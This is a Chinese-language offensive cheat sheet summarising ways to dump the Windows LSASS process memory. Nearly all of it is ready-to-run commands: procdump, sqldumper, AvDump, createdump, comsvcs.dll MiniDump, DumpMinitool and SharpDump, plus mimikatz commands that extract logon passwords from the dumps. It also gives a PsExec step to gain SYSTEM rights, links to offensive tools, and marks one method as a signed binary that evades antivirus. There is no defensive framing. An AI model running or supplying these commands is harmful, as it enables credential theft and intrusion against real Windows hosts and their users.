LSASS进程dump方法总结

  1. procdump dmp内存存储文件
procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
  1. sqldumper dmp内存存储文件
  • 方法一:
tasklist /svc |findstr lsass.exe
sqldumper.exe [lsass PID] 0 0x01100
  • 方法二:
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sqldumper.exe %i 0 0x01100
  • mimikatz读取mdmp文件:
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"
  1. avdump64 dmp内存存储文件
for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do powershell -c ".\AvDump_64.exe --pid %i --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file c:\programdata\lsass.dmp"
  1. .net createdump dmp内存存储文件
.net5 下载地址
https://download.visualstudio.microsoft.com/download/pr/f05c10fe-fed3-43b6-b676-ff75021c2d9f/15cab750af61a29d70ef33c265354cf2/dotnet-runtime-5.0.3-win-x64.exe
安装成功的路径地址
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe
tasklist /svc | findstr lsass    //查看lsass进程pid

PsExec.exe -s -i -d cmd.exe    //获取system权限

"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe"  -u -f C:\programdata\lsass.dmp pid

powershell 可直接获取dmp文件
powershell -c ".\createdump.exe -u -f lsass.dmp pid"
  1. comsvcs.dll dmp内存存储文件
powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"
  • comsvcs.dll dmp内存存储文件
for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do powershell -c "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %B lsass.dmp full"
  1. DumpMinitool dmp内存存储文件
  • Visual Studio 2022自带、微软签名、免杀
C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do DumpMinitool.exe --file 1.txt --processId %i --dumpType Full
  1. SharpDump dmp内存存储文件
for /f "tokens:2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sharpDump.exe %i
  1. Github dmp内存存储文件
https://github.com/codewhitesec/HandleKatz

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

https://github.com/helpsystems/nanodump

https://twitter.com/mrd0x/status/1460597833917251595 dump64.exe

https://github.com/itm4n/PPLdump